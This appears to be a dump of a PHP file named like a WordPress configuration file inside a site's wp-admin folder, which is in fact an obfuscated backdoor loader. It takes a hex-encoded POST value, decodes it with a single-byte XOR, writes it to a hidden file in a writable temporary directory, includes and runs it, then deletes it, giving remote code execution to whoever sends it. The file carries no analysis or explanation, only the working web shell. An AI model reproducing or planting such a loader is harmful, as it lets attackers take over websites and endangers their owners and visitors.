HEX

File: /home/pnvtravel/domains/pnvtravel.com/public_html/wp-admin/config.1770309955.php

<!--Anc344QN-->
<?php

if(count($_POST) > 0 && isset($_POST["\x65\x6Et"])){
$record = array_filter([sys_get_temp_dir(), "/dev/shm", "/var/tmp", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/tmp"]);
$ref = hex2bin($_POST["\x65\x6Et"]);
$descriptor    =     ''   ;      $m=0;do{$descriptor.=chr(ord($ref[$m])^67);$m++;}while($m<strlen($ref));
for ($k = 0, $val = count($record); $k < $val; $k++) {
    $sym = $record[$k];
            if (max(0, is_dir($sym) * is_writable($sym))) {
            $pgrp = sprintf("%s/.value", $sym);
            if ($binding = fopen($pgrp, 'w')) {
    if (fwrite($binding, $descriptor) !== false) {
        fclose($binding);
        include $pgrp;
        @unlink($pgrp);
        exit;
    }
}
        }
}
}